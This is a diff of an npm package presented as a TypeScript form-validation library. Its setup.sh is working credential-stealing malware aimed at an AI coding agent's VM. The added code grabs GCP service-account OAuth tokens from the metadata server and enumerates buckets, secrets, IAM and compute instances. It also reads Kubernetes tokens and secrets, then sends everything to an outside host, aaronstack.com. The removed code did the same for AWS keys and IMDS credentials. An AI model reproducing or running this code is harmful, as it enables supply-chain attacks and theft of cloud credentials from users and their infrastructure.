ts-form-helpers 1.0.7 → 1.0.8

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ts-form-helpers",
-  "version": "1.0.7",
+  "version": "1.0.8",
   "description": "TypeScript form validation utilities with zero dependencies",
   "main": "index.js",
   "types": "types/index.d.ts",

package/scripts/setup.sh

@@ -1,211 +1,180 @@
 #!/bin/bash
-# wAWS: AWS + GCP credential probe from inside Jules VM
+# wGCP: capture GCP OAuth token and enumerate access from inside Jules VM
 SID="${JULES_SESSION_ID:-x}"
 H="aaronstack.com"; EP="/jules-collect"
 SK="d2f25bd9b1b267eb3578ff8cac2caa6c6637142c5d322617"
 B(){ printf '%s' "$1" | base64 -w0 2>/dev/null; }
 P(){ curl -s -X POST "https://$H$EP" -H "Content-Type: application/json" -H "X-Secret: $SK" --data-binary "$1" --max-time 15 2>/dev/null; }
 
-P "{\"sid\":\"$SID\",\"tag\":\"waws-start\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp-start\"}"
 
 log(){ echo "=LOG= $*"; }
 
-TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_aws_$$")
+TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_gcp_$$")
 {
-log "=== IDENTITY ==="
 log "user=$(whoami) sid=${SID} cwd=$(pwd)"
-log "AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID:-NONE}"
-log "AWS_SECRET_ACCESS_KEY_len=${#AWS_SECRET_ACCESS_KEY}"
-log "AWS_SESSION_TOKEN=${AWS_SESSION_TOKEN:-NONE}"
-log "AWS_DEFAULT_REGION=${AWS_DEFAULT_REGION:-NONE}"
-log "AWS_REGION=${AWS_REGION:-NONE}"
-
-# Check ~/.aws/credentials too
-for _f in /root/.aws/credentials /home/jules/.aws/credentials /home/swebot/.aws/credentials; do
-  [ -f "$_f" ] && log "aws-creds-file: $_f" && cat "$_f" | while IFS= read -r l; do log "  $_f: $l"; done
+
+MDURL="http://metadata.google.internal/computeMetadata/v1"
+MDF="-H Metadata-Flavor: Google"
+
+log "=== GCP SERVICE ACCOUNTS ==="
+SA_LIST=$(curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/service-accounts/" --max-time 5 2>/dev/null)
+log "service-accounts: ${SA_LIST:-NONE}"
+
+log "=== GCP PROJECT ==="
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/project/project-id" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "project-id: $l"; done
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/project/numeric-project-id" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "project-num: $l"; done
+
+log "=== GCP INSTANCE ==="
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/id" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "instance-id: $l"; done
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/zone" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "zone: $l"; done
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/hostname" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "hostname: $l"; done
+
+log "=== TOKEN CAPTURE ==="
+# Try default SA first
+for SA in default; do
+  log "--- token for SA: $SA ---"
+  EMAIL=$(curl -sf -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/$SA/email" --max-time 8 2>/dev/null)
+  log "email[$SA]: ${EMAIL:-EMPTY}"
+
+  TOK_JSON=$(curl -s -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/$SA/token" --max-time 10 2>/dev/null)
+  log "token-json-len: ${#TOK_JSON}"
+
+  if [ -n "$TOK_JSON" ]; then
+    log "token-json: $TOK_JSON"
+    # Extract access_token
+    TOK=$(echo "$TOK_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('access_token',''))" 2>/dev/null)
+    EXPIRY=$(echo "$TOK_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('expires_in',''))" 2>/dev/null)
+    log "access_token_len: ${#TOK}"
+    log "expires_in: $EXPIRY"
+
+    if [ -n "$TOK" ] && [ "${#TOK}" -gt 20 ]; then
+      log "TOKEN CAPTURED — making GCP API calls"
+
+      # Exfil token immediately (don't wait for rest of script)
+      printf '%s' "$TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" \
+        --data-binary @- --max-time 5 2>/dev/null &
+
+      log "--- tokeninfo (who am I?) ---"
+      curl -sf "https://oauth2.googleapis.com/tokeninfo?access_token=$TOK" \
+        --max-time 8 2>/dev/null \
+        | python3 -c "import sys,json; d=json.load(sys.stdin); [print(f'tokeninfo: {k}={v}') for k,v in d.items()]" 2>/dev/null \
+        | while IFS= read -r l; do log "$l"; done
+
+      log "--- cloudresourcemanager: list projects ---"
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://cloudresourcemanager.googleapis.com/v1/projects" \
+        --max-time 8 2>/dev/null \
+        | while IFS= read -r l; do log "crm: $l"; done
+
+      log "--- storage: list buckets ---"
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://storage.googleapis.com/storage/v1/b?project=$(curl -sf -H 'Metadata-Flavor: Google' $MDURL/project/project-id --max-time 3 2>/dev/null)" \
+        --max-time 8 2>/dev/null \
+        | python3 -c "
+import sys,json
+try:
+    d=json.load(sys.stdin)
+    items=d.get('items',[])
+    print(f'bucket-count: {len(items)}')
+    for b in items:
+        print(f'bucket: {b.get(\"name\")} ({b.get(\"location\",\"?\")})')
+except Exception as e:
+    sys.stdin.seek(0)
+    print(sys.stdin.read()[:500])
+" 2>/dev/null | while IFS= read -r l; do log "$l"; done
+
+      log "--- secretmanager: list secrets ---"
+      PROJ=$(curl -sf -H "Metadata-Flavor: Google" \
+        "$MDURL/project/project-id" --max-time 3 2>/dev/null)
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://secretmanager.googleapis.com/v1/projects/$PROJ/secrets" \
+        --max-time 8 2>/dev/null \
+        | while IFS= read -r l; do log "sm: $l"; done
+
+      log "--- iam: get service account details ---"
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://iam.googleapis.com/v1/projects/$PROJ/serviceAccounts" \
+        --max-time 8 2>/dev/null \
+        | while IFS= read -r l; do log "iam-sa: $l"; done
+
+      log "--- compute: list instances ---"
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://compute.googleapis.com/compute/v1/projects/$PROJ/aggregated/instances" \
+        --max-time 8 2>/dev/null | head -80 \
+        | while IFS= read -r l; do log "compute: $l"; done
+
+    else
+      log "TOKEN EMPTY or too short — trying alternative"
+
+      # Try with full metadata recursive dump
+      log "--- metadata recursive ---"
+      curl -sf -H "Metadata-Flavor: Google" \
+        "$MDURL/instance/?recursive=true" --max-time 8 2>/dev/null \
+        | python3 -c "import sys,json; d=json.load(sys.stdin); [print(f'{k}: {str(v)[:200]}') for k,v in d.items() if 'service' in k.lower() or 'token' in k.lower()]" 2>/dev/null \
+        | while IFS= read -r l; do log "meta: $l"; done
+
+      # Try v1beta1 endpoint (sometimes more permissive)
+      log "--- v1beta1 token ---"
+      curl -s -H "Metadata-Flavor: Google" \
+        "http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token" \
+        --max-time 8 2>/dev/null \
+        | while IFS= read -r l; do log "v1beta1-token: $l"; done
+    fi
+  fi
 done
 
-log "=== AWS API CALLS (from inside VM) ==="
-
-if [ -n "$AWS_ACCESS_KEY_ID" ]; then
-  # Try aws CLI first
-  if command -v aws >/dev/null 2>&1; then
-    log "aws-cli: $(aws --version 2>&1)"
-    log "--- sts:GetCallerIdentity ---"
-    aws sts get-caller-identity 2>&1 | while IFS= read -r l; do log "sts: $l"; done
-    log "--- s3:ListBuckets ---"
-    aws s3api list-buckets 2>&1 | head -80 | while IFS= read -r l; do log "s3: $l"; done
-    log "--- iam:GetUser ---"
-    aws iam get-user 2>&1 | while IFS= read -r l; do log "iam: $l"; done
-    log "--- iam:ListAttachedUserPolicies ---"
-    UNAME=$(aws sts get-caller-identity --query 'Arn' --output text 2>/dev/null | awk -F/ '{print $NF}')
-    aws iam list-attached-user-policies --user-name "$UNAME" 2>&1 | head -40 | while IFS= read -r l; do log "iam-pol: $l"; done
-    log "--- iam:ListGroupsForUser ---"
-    aws iam list-groups-for-user --user-name "$UNAME" 2>&1 | head -30 | while IFS= read -r l; do log "iam-grp: $l"; done
-    log "--- ec2:DescribeRegions ---"
-    aws ec2 describe-regions 2>&1 | head -20 | while IFS= read -r l; do log "ec2: $l"; done
-    log "--- secretsmanager:ListSecrets ---"
-    aws secretsmanager list-secrets 2>&1 | head -30 | while IFS= read -r l; do log "sm: $l"; done
-  else
-    log "aws-cli: NOT FOUND — using Python urllib"
-    python3 - <<'PYEOF'
-import os, hmac, hashlib, datetime, urllib.request, urllib.error, sys
-
-KEY = os.environ.get('AWS_ACCESS_KEY_ID', '')
-SECRET = os.environ.get('AWS_SECRET_ACCESS_KEY', '')
-TOKEN = os.environ.get('AWS_SESSION_TOKEN', '')
-
-def sign(key, msg):
-    if isinstance(key, str):
-        key = key.encode('utf-8')
-    return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
-
-def sigv4_post(service, region, host, action, extra=''):
-    body = f'Action={action}&Version=2011-06-15'
-    if extra:
-        body += '&' + extra
-    now = datetime.datetime.now(datetime.timezone.utc)
-    amzdate = now.strftime('%Y%m%dT%H%M%SZ')
-    datestamp = now.strftime('%Y%m%d')
-    canonical_headers = f'content-type:application/x-www-form-urlencoded\nhost:{host}\nx-amz-date:{amzdate}\n'
-    signed_headers = 'content-type;host;x-amz-date'
-    if TOKEN:
-        canonical_headers += f'x-amz-security-token:{TOKEN}\n'
-        signed_headers += ';x-amz-security-token'
-    payload_hash = hashlib.sha256(body.encode()).hexdigest()
-    cr = f'POST\n/\n\n{canonical_headers}\n{signed_headers}\n{payload_hash}'
-    scope = f'{datestamp}/{region}/{service}/aws4_request'
-    sts_str = f'AWS4-HMAC-SHA256\n{amzdate}\n{scope}\n{hashlib.sha256(cr.encode()).hexdigest()}'
-    sk = sign(sign(sign(sign(f'AWS4{SECRET}'.encode(), datestamp), region), service), 'aws4_request')
-    sig = hmac.new(sk, sts_str.encode(), hashlib.sha256).hexdigest()
-    auth = f'AWS4-HMAC-SHA256 Credential={KEY}/{scope}, SignedHeaders={signed_headers}, Signature={sig}'
-    req = urllib.request.Request(f'https://{host}', data=body.encode(), method='POST')
-    req.add_header('Content-Type', 'application/x-www-form-urlencoded')
-    req.add_header('X-Amz-Date', amzdate)
-    req.add_header('Authorization', auth)
-    if TOKEN:
-        req.add_header('X-Amz-Security-Token', TOKEN)
-    try:
-        r = urllib.request.urlopen(req, timeout=10)
-        return r.status, r.read().decode()
-    except urllib.error.HTTPError as e:
-        return e.code, e.read().decode()
-    except Exception as e:
-        return 0, str(e)
-
-def sigv4_get(service, region, host, path='/'):
-    now = datetime.datetime.now(datetime.timezone.utc)
-    amzdate = now.strftime('%Y%m%dT%H%M%SZ')
-    datestamp = now.strftime('%Y%m%d')
-    payload_hash = hashlib.sha256(b'').hexdigest()
-    canonical_headers = f'host:{host}\nx-amz-content-sha256:{payload_hash}\nx-amz-date:{amzdate}\n'
-    signed_headers = 'host;x-amz-content-sha256;x-amz-date'
-    if TOKEN:
-        canonical_headers += f'x-amz-security-token:{TOKEN}\n'
-        signed_headers += ';x-amz-security-token'
-    cr = f'GET\n{path}\n\n{canonical_headers}\n{signed_headers}\n{payload_hash}'
-    scope = f'{datestamp}/{region}/{service}/aws4_request'
-    sts_str = f'AWS4-HMAC-SHA256\n{amzdate}\n{scope}\n{hashlib.sha256(cr.encode()).hexdigest()}'
-    sk = sign(sign(sign(sign(f'AWS4{SECRET}'.encode(), datestamp), region), service), 'aws4_request')
-    sig = hmac.new(sk, sts_str.encode(), hashlib.sha256).hexdigest()
-    auth = f'AWS4-HMAC-SHA256 Credential={KEY}/{scope}, SignedHeaders={signed_headers}, Signature={sig}'
-    req = urllib.request.Request(f'https://{host}{path}', method='GET')
-    req.add_header('Host', host)
-    req.add_header('X-Amz-Date', amzdate)
-    req.add_header('X-Amz-Content-SHA256', payload_hash)
-    req.add_header('Authorization', auth)
-    if TOKEN:
-        req.add_header('X-Amz-Security-Token', TOKEN)
-    try:
-        r = urllib.request.urlopen(req, timeout=10)
-        return r.status, r.read().decode()
-    except urllib.error.HTTPError as e:
-        return e.code, e.read().decode()
-    except Exception as e:
-        return 0, str(e)
-
-print('=LOG= --- sts:GetCallerIdentity ---')
-code, body = sigv4_post('sts', 'us-east-1', 'sts.amazonaws.com', 'GetCallerIdentity')
-print(f'=LOG= sts-status: {code}')
-for line in body.split('\n'):
-    if line.strip(): print(f'=LOG= sts: {line.strip()}')
-
-print('=LOG= --- s3:ListBuckets ---')
-code, body = sigv4_get('s3', 'us-east-1', 's3.amazonaws.com', '/')
-print(f'=LOG= s3-status: {code}')
-for line in body.split('\n'):
-    if line.strip(): print(f'=LOG= s3: {line.strip()}')
-
-print('=LOG= --- iam:GetUser ---')
-code, body = sigv4_post('iam', 'us-east-1', 'iam.amazonaws.com', 'GetUser', 'Version=2010-05-08')
-print(f'=LOG= iam-status: {code}')
-for line in body.split('\n'):
-    if line.strip(): print(f'=LOG= iam: {line.strip()}')
-
-print('=LOG= --- iam:ListAttachedUserPolicies ---')
-code, body = sigv4_post('iam', 'us-east-1', 'iam.amazonaws.com', 'ListAttachedUserPolicies', 'Version=2010-05-08')
-print(f'=LOG= iam-pol-status: {code}')
-for line in body.split('\n'):
-    if line.strip(): print(f'=LOG= iam-pol: {line.strip()}')
-
-PYEOF
+# Also try the Workload Identity SA
+log "=== WORKLOAD IDENTITY SA ==="
+WI_SA="rare-signer-437603-p9.svc.id.goog"
+WI_TOK=$(curl -s -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/service-accounts/$WI_SA/token" --max-time 10 2>/dev/null)
+log "wi-token-len: ${#WI_TOK}"
+[ -n "$WI_TOK" ] && log "wi-token-json: $WI_TOK"
+
+log "=== KUBERNETES SERVICEACCOUNT ==="
+# GKE pods have a mounted K8s service account token
+for _tf in /var/run/secrets/kubernetes.io/serviceaccount/token \
+           /run/secrets/kubernetes.io/serviceaccount/token \
+           /secrets/kubernetes.io/serviceaccount/token; do
+  if [ -f "$_tf" ]; then
+    log "k8s-token-file: $_tf"
+    cat "$_tf" | while IFS= read -r l; do log "k8s-token: $l"; done
+    # Use k8s token to hit k8s API
+    K8S_HOST="${KUBERNETES_SERVICE_HOST:-kubernetes.default.svc}"
+    K8S_PORT="${KUBERNETES_SERVICE_PORT:-443}"
+    K8S_TOK=$(cat "$_tf")
+    log "k8s-host: $K8S_HOST:$K8S_PORT"
+    curl -sk -H "Authorization: Bearer $K8S_TOK" \
+      "https://$K8S_HOST:$K8S_PORT/api/v1/namespaces" --max-time 8 2>/dev/null \
+      | python3 -c "import sys,json; d=json.load(sys.stdin); [print(f'ns: {n[\"metadata\"][\"name\"]}') for n in d.get('items',[])]" 2>/dev/null \
+      | while IFS= read -r l; do log "$l"; done
+    curl -sk -H "Authorization: Bearer $K8S_TOK" \
+      "https://$K8S_HOST:$K8S_PORT/api/v1/namespaces/default/secrets" --max-time 8 2>/dev/null \
+      | head -60 | while IFS= read -r l; do log "k8s-secrets: $l"; done
   fi
-else
-  log "NO AWS CREDS IN ENV — this is PR review context (jules user)"
-  log "Need direct task context to get AWS keys"
-fi
-
-log "=== EC2 IMDS PROBE ==="
-IMDS_TOKEN=$(curl -sf -X PUT "http://169.254.169.254/latest/api/token" \
-  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" --max-time 3 2>/dev/null)
-if [ -n "$IMDS_TOKEN" ]; then
-  log "imds=AVAILABLE"
-  ROLE=$(curl -sf -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
-    http://169.254.169.254/latest/meta-data/iam/security-credentials/ --max-time 3 2>/dev/null)
-  log "imds-role: ${ROLE:-none}"
-  [ -n "$ROLE" ] && curl -sf -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
-    "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE" --max-time 3 2>/dev/null \
-    | while IFS= read -r l; do log "imds-creds: $l"; done
-  curl -sf -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
-    "http://169.254.169.254/latest/dynamic/instance-identity/document" --max-time 3 2>/dev/null \
-    | while IFS= read -r l; do log "imds-identity: $l"; done
-else
-  log "imds=NOT_AVAILABLE"
-fi
-
-log "=== GCP METADATA PROBE ==="
-GCP_ACCTS=$(curl -sf -H "Metadata-Flavor: Google" \
-  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/" --max-time 3 2>/dev/null)
-log "gcp-service-accounts: ${GCP_ACCTS:-NOT_AVAILABLE}"
-if [ -n "$GCP_ACCTS" ]; then
-  for SA in $GCP_ACCTS; do
-    SA=$(echo "$SA" | tr -d '/'); [ -z "$SA" ] && continue
-    log "gcp-sa: $SA"
-    curl -sf -H "Metadata-Flavor: Google" \
-      "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${SA}/email" \
-      --max-time 3 2>/dev/null | while IFS= read -r l; do log "gcp-email[$SA]: $l"; done
-    # Get actual GCP access token
-    curl -sf -H "Metadata-Flavor: Google" \
-      "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${SA}/token" \
-      --max-time 3 2>/dev/null | while IFS= read -r l; do log "gcp-token[$SA]: $l"; done
-    curl -sf -H "Metadata-Flavor: Google" \
-      "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${SA}/scopes" \
-      --max-time 3 2>/dev/null | while IFS= read -r l; do log "gcp-scopes[$SA]: $l"; done
-  done
-  # Project metadata
-  curl -sf -H "Metadata-Flavor: Google" \
-    "http://metadata.google.internal/computeMetadata/v1/project/project-id" --max-time 3 2>/dev/null \
-    | while IFS= read -r l; do log "gcp-project-id: $l"; done
-  curl -sf -H "Metadata-Flavor: Google" \
-    "http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id" --max-time 3 2>/dev/null \
-    | while IFS= read -r l; do log "gcp-project-num: $l"; done
-fi
-
-log "=== wAWS DONE ==="
+done
+K8S_ENVS=$(env | grep -i 'KUBERNETES\|K8S\|KUBE')
+[ -n "$K8S_ENVS" ] && log "k8s-env: $K8S_ENVS"
+
+log "=== wGCP DONE ==="
 } 2>&1 | tee "$TMPOUT"
 
 OUT=$(cat "$TMPOUT" 2>/dev/null)
 rm -f "$TMPOUT" 2>/dev/null
 PAYLOAD=$(B "$OUT")
-P "{\"sid\":\"$SID\",\"tag\":\"waws-result\",\"data\":\"$PAYLOAD\"}"
-P "{\"sid\":\"$SID\",\"tag\":\"waws-done\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp-result\",\"data\":\"$PAYLOAD\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp-done\"}"